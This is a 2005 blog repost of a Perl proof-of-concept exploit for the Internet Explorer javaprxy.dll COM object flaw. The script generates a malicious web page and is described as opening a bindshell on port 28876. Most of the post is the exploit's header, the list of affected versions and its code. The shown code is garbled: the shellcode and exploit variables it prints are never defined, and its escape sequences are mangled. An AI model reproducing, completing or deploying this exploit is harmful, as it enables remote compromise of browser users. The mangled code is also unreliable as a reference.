ITPub博客

首页 > IT基础架构 > 网络安全 > Microsoft Internet Explorer "javaprxy.dll" COM Object Exploit -Unpatched

Microsoft Internet Explorer "javaprxy.dll" COM Object Exploit -Unpatched

原创 网络安全 作者:coolwinds 时间:2005-07-08 11:21:51 0 删除 编辑
Microsoft Internet Explorer "javaprxy.dll" COM Object Exploit -Unpatched[@more@]

<!--
(update) frsirt updated the comments to reflect skylined's code + gpl. /str0ke

Perl code is commented so people can test the vuln on their IE /str0ke

#!/usr/bin/perl
#
######################################################
#
# Microsoft Internet Explorer "javaprxy.dll" COM Object Exploit -Unpatched-
#
# Proof of Concept by the FrSIRT < http://www.frsirt.com / team@frsirt.com >
# Bindshell on port 28876 - Based on Berend-Jan Wever's IE exploit
# 01 July 2005
#
# Description - http://www.frsirt.com/english/advisories/2005/0935
# Workarounds - http://www.microsoft.com/technet/security/advisory/903144.mspx
# sec-consult - http://www.sec-consult.com/184.html
#
# Solution :
# Set Internet and Local intranet security zone settings to "High" or use
# another browser until a patch is released.
#
# Tested on :
# Internet Explorer 6 on Microsoft Windows XP SP2
# Internet Explorer 6 on Microsoft Windows XP SP1
#
# Affected versions :
# Internet Explorer 5.01 Service Pack 3 on Microsoft Windows 2000 Service Pack 3
# Internet Explorer 5.01 Service Pack 4 on Microsoft Windows 2000 Service Pack 4
# Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 3
# Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 4
# Internet Explorer 6 Service Pack 1 on Microsoft Windows XP Service Pack 1
# Internet Explorer 6 for Microsoft Windows XP Service Pack 2
# Internet Explorer 6 Service Pack 1 for Microsoft Windows XP 64-Bit SP1 (Itanium)
# Internet Explorer 6 for Microsoft Windows Server 2003
# Internet Explorer 6 for Microsoft Windows Server 2003 Service Pack 1
# Internet Explorer 6 for Microsoft Windows Server 2003 for Itanium-based Systems
# Internet Explorer 6 for Microsoft Windows Server 2003 with SP1 for Itanium
# Internet Explorer 6 for Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium)
# Internet Explorer 6 for Microsoft Windows Server 2003 x64 Edition
# Internet Explorer 6 for Microsoft Windows XP Professional x64 Edition
# Internet Explorer 5.5 Service Pack 2 on Microsoft Windows Millennium Edition
# Internet Explorer 6 Service Pack 1 on Microsoft Windows 98
# Internet Explorer 6 Service Pack 1 on Microsoft Windows 98 SE
# Internet Explorer 6 Service Pack 1 on Microsoft Windows Millennium Edition
#
# Usage : perl iejavaprxyexploit.pl > mypage.html
#
######################################################
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License version 2, 1991 as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# A copy of the GNU General Public License can be found at:
# http://www.gnu.org/licenses/gpl.html
# or you can write to:
# Free Software Foundation, Inc.
# 59 Temple Place - Suite 330
# Boston, MA 02111-1307
# USA.
#
######################################################

# header
my $header = "nn";

# javaprxy.dll
my $clsid = '03D9F3F2-B0E3-11D2-B081-006008039BF0';

# footer
my $footer = "n".
"Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploitn".
"by the FrSIRT < http://www.frsirt.com >n".
"Solution - http://www.frsirt.com/english/advisories/2005/0935".
"";

# print "Content-Type: text/html;rnrn"; # if you are in cgi-bin
print "$header $shellcode $code $footer";

-->




Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit
by the FrSIRT < http://www.frsirt.com >
Solution - http://www.frsirt.com/english/advisories/2005/0935>
# milw0rm.com [2005-07-05]

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/83980/viewspace-801837/,如需转载,请注明出处,否则将追究法律责任。

请登录后发表评论 登录
全部评论

注册时间:2012-10-23

  • 博文量
    253
  • 访问量
    947332